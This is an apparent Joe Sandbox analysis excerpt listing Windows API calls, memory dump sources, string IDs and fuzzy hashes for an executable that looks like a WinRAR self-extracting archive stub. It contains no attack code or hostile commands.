                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,005A2AF1,005A02FC,0059FA34), ref: 005A2B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005A2B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A2B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,005A2AF1,005A02FC,0059FA34), ref: 005A2B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,005C1030,005A4674,005C1030,?,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A97E9
                                                                                                                    • _free.LIBCMT ref: 005A981C
                                                                                                                    • _free.LIBCMT ref: 005A9844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A9851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A985D
                                                                                                                    • _abort.LIBCMT ref: 005A9863
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 0216f1d65a4ee1f3e4bf090a8e7c5ca4c060b7a2bb64279defca2b4abcc90948
                                                                                                                    • Instruction ID: b3b1907d8637122417f86a34341fb0d3863f3f339c8c0610985dd600eb5c6f0e
                                                                                                                    • Opcode Fuzzy Hash: 0216f1d65a4ee1f3e4bf090a8e7c5ca4c060b7a2bb64279defca2b4abcc90948
                                                                                                                    • Instruction Fuzzy Hash: B9F0C83514062766C75233347C1EA6F2E69FFE3B71F340224F614A2192FF38880A9565
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0059DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 0059DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0059DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0059DC91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: dec22b435975bb0952d2ea19487e003e4436f16ad8935cc85ec53b787b3d957a
                                                                                                                    • Instruction ID: d20d3df6534469a1589cab1ca13ead9f5e85a46e3281a4d77654b3e4ea9c6272
                                                                                                                    • Opcode Fuzzy Hash: dec22b435975bb0952d2ea19487e003e4436f16ad8935cc85ec53b787b3d957a
                                                                                                                    • Instruction Fuzzy Hash: 0CF03C72A01229BBCF20ABA5DC4CDDB7F7DEF51791B004121F50AE6050D674964AD7B0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059A699: GetDC.USER32(00000000), ref: 0059A69D
                                                                                                                      • Part of subcall function 0059A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0059A6A8
                                                                                                                      • Part of subcall function 0059A699: ReleaseDC.USER32(00000000,00000000), ref: 0059A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0059A83C
                                                                                                                      • Part of subcall function 0059AAC9: GetDC.USER32(00000000), ref: 0059AAD2
                                                                                                                      • Part of subcall function 0059AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0059AB01
                                                                                                                      • Part of subcall function 0059AAC9: ReleaseDC.USER32(00000000,?), ref: 0059AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: "Y$($AY
                                                                                                                    • API String ID: 1061551593-4108297516
                                                                                                                    • Opcode ID: f63a38aa6e9e27049e37affdd0fef8c68b395383e2f274dad66b8bd7c91bf74b
                                                                                                                    • Instruction ID: c0b1a35637d2fed6197d5ca26be9042781a501ebd5d1a761e93cc3e34cbf420d
                                                                                                                    • Opcode Fuzzy Hash: f63a38aa6e9e27049e37affdd0fef8c68b395383e2f274dad66b8bd7c91bf74b
                                                                                                                    • Instruction Fuzzy Hash: B291E375604350AFDB51DF25C848A2BBBE8FFD9700F00491EF59AD7260DB30A905DBA2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                      • Part of subcall function 0058B92D: _wcsrchr.LIBVCRUNTIME ref: 0058B944
                                                                                                                    • _wcslen.LIBCMT ref: 0058C197
                                                                                                                    • _wcslen.LIBCMT ref: 0058C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: 40df12bb59cdcf3150d26886733df4db84790914e5df59389da6c39e46243d8b
                                                                                                                    • Instruction ID: 409f52b542173a3d789041f7fe6ec1fb4484ed6341fdf8e3d61990f8719705bb
                                                                                                                    • Opcode Fuzzy Hash: 40df12bb59cdcf3150d26886733df4db84790914e5df59389da6c39e46243d8b
                                                                                                                    • Instruction Fuzzy Hash: BD41F22655032699DB31BF24885AA7EBFA8FF81744F14090EFD967B1C1EB705A81C3B1
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0058A275,?,?,00000800,?,0058A23A,?,0058755C), ref: 0058BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 0058BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: b55a9780b4c67c954bc56051615b8c1b0f8f0233cfd3c4699d754fbda0ab551c
                                                                                                                    • Instruction ID: f14b868fd2ed01cd64f817ec1a6b3971aea09d31b5af791d92e40fe923082504
                                                                                                                    • Opcode Fuzzy Hash: b55a9780b4c67c954bc56051615b8c1b0f8f0233cfd3c4699d754fbda0ab551c
                                                                                                                    • Instruction Fuzzy Hash: E6417F31840217AAEF21BF60CC46EEA7FADBF85390F104465FC54B7151EB70AE908B60
                                                                                                                    APIs
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0059CD84
                                                                                                                      • Part of subcall function 0059AF98: _wcschr.LIBVCRUNTIME ref: 0059B033
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$CompareString
                                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                                    • API String ID: 69343711-3358265660
                                                                                                                    • Opcode ID: 92faed0b257b70b070535c0693301ba120a3ee775132cd17aa54da6610277492
                                                                                                                    • Instruction ID: 5dec64be7801cbf7a139aa7fb3cc15cf9c4ad01597b44d3e972b56906622d742
                                                                                                                    • Opcode Fuzzy Hash: 92faed0b257b70b070535c0693301ba120a3ee775132cd17aa54da6610277492
                                                                                                                    • Instruction Fuzzy Hash: F931837290061A9ADF25DB50CC45FEE7FBCFB55350F004566E506E7180EBB09E848FA1
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0059AAD2
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0059AB01
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0059AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease
                                                                                                                    • String ID: -Y$7Y
                                                                                                                    • API String ID: 1429681911-16496590
                                                                                                                    • Opcode ID: a9dc8d3cd14ec4952d3dc85a5deea270bf5fb13c83240174814274643e9c36b1
                                                                                                                    • Instruction ID: 47ccb0b3943fb19f69e1759f79e5382d286450d4a3a0fd7001b69c85fba27155
                                                                                                                    • Opcode Fuzzy Hash: a9dc8d3cd14ec4952d3dc85a5deea270bf5fb13c83240174814274643e9c36b1
                                                                                                                    • Instruction Fuzzy Hash: 95211972108344FFD3059FA5DC8CE6FBFE9FB99351F040829FA8597120D6319A58AB62
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0058B9B8
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0058B9D6
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0058B9E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 525462905-3142399695
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0059B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0059B304
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1$xz]
                                                                                                                    • API String ID: 445417207-102821554
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0059B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0059B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0059B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0059B767
                                                                                                                      • Part of subcall function 0059A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0059B73D,00000066), ref: 0059A6D5
                                                                                                                      • Part of subcall function 0059A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A6EC
                                                                                                                      • Part of subcall function 0059A6C2: LoadResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A703
                                                                                                                      • Part of subcall function 0059A6C2: LockResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A712
                                                                                                                      • Part of subcall function 0059A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0059B73D,00000066), ref: 0059A72D
                                                                                                                      • Part of subcall function 0059A6C2: GlobalLock.KERNEL32(00000000), ref: 0059A73E
                                                                                                                      • Part of subcall function 0059A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0059A762
                                                                                                                      • Part of subcall function 0059A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0059A7A7
                                                                                                                      • Part of subcall function 0059A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0059A7C6
                                                                                                                      • Part of subcall function 0059A6C2: GlobalFree.KERNEL32(00000000), ref: 0059A7CD
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0059D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0059D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0059D684
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005A7E24,00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002), ref: 005A7E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005A7EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,005A7E24,00000000,?,005A7DC4,00000000,005BC300,0000000C,005A7F1B,00000000,00000002), ref: 005A7EC9
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                      • Part of subcall function 0059081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0058F2E4
                                                                                                                    • GetProcAddress.KERNEL32(005C81C8,CryptUnprotectMemory), ref: 0058F2F4
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: d9e88f4424f8b73c4f32727426ab87185e0dd1005c1a6e94079b14c3db74cf1d
                                                                                                                    • Instruction ID: c32c2ee7893bc05cbf0baec6a95715c9f88a82345168048171fcc4b0f79af62f
                                                                                                                    • Opcode Fuzzy Hash: d9e88f4424f8b73c4f32727426ab87185e0dd1005c1a6e94079b14c3db74cf1d
                                                                                                                    • Instruction Fuzzy Hash: 6451C371604212AFDB298F18D85ABBEBFA4FF96710F24452DEC02476A2E731ED41D790
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 005ABF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005ABF5C
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005ABF82
                                                                                                                    • _free.LIBCMT ref: 005ABF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005ABFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: f604e565076c7a2de85af679ed8738cc5bee6b81f7c2a6cb8b9a8b395d13a09c
                                                                                                                    • Instruction ID: 4848f92ef6fc64059e496950d9944261f96073b4bd765d29d7529338988597db
                                                                                                                    • Opcode Fuzzy Hash: f604e565076c7a2de85af679ed8738cc5bee6b81f7c2a6cb8b9a8b395d13a09c
                                                                                                                    • Instruction Fuzzy Hash: 24015EA26056157F3321167A5C4DC7F6F6DFAC3BA13280229F904D2142EB609D0195F0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,005A91AD,005AB188,?,005A9813,00000001,00000364,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A986E
                                                                                                                    • _free.LIBCMT ref: 005A98A3
                                                                                                                    • _free.LIBCMT ref: 005A98CA
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A98D7
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A98E0
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: e37851f97885c6a6a37760435d64db4e20fcf02a49781b0341be265b4bfb9797
                                                                                                                    • Instruction ID: 6089786291ed66f2b082b3b1e88370d755bae723d678d7bab288ccac19509e95
                                                                                                                    • Opcode Fuzzy Hash: e37851f97885c6a6a37760435d64db4e20fcf02a49781b0341be265b4bfb9797
                                                                                                                    • Instruction Fuzzy Hash: 2801F4361446276BC31233346C8D96F2D2DFFE3770B250234F505A2192FF388C06A161
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005911CF: ResetEvent.KERNEL32(?), ref: 005911E1
                                                                                                                      • Part of subcall function 005911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005911F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00590F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00590F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00590F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00590F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00590F6C
                                                                                                                      • Part of subcall function 00590FE4: WaitForSingleObject.KERNEL32(?,000000FF,00591206,?), ref: 00590FEA
                                                                                                                      • Part of subcall function 00590FE4: GetLastError.KERNEL32(?), ref: 00590FF6
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: 4e90c1bd09d894c16ebb0adec088f8af098c8de7cf7c08d0fb99db7439c45541
                                                                                                                    • Instruction ID: f1120a61d4d0e17626199a5af786d07015c7e5ee3976864c47a619e6d61f12a5
                                                                                                                    • Opcode Fuzzy Hash: 4e90c1bd09d894c16ebb0adec088f8af098c8de7cf7c08d0fb99db7439c45541
                                                                                                                    • Instruction Fuzzy Hash: A6017571504B44EFCB62AF64DC89BC6FBA9FF08710F100929F16B621A0CB757A48DB54
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005AC817
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005AC829
                                                                                                                    • _free.LIBCMT ref: 005AC83B
                                                                                                                    • _free.LIBCMT ref: 005AC84D
                                                                                                                    • _free.LIBCMT ref: 005AC85F
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: d00cbcf0821b499161efb291ea6e9d0cd17aa1f227dca0603e8150616cde8953
                                                                                                                    • Instruction ID: 824f7d42082d3673383b35c74bb3afcbefd29064402a84fe4540a682fe01be10
                                                                                                                    • Opcode Fuzzy Hash: d00cbcf0821b499161efb291ea6e9d0cd17aa1f227dca0603e8150616cde8953
                                                                                                                    • Instruction Fuzzy Hash: 1FF01D72504202AB8760EB78E98BC6E7FEDBB52714B685819F109D7552CB74FC80CA64
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00591FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00591FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00592006
                                                                                                                    • _wcslen.LIBCMT ref: 00592014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0058B371,?,?,00000000,?,?,?), ref: 0059202F
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
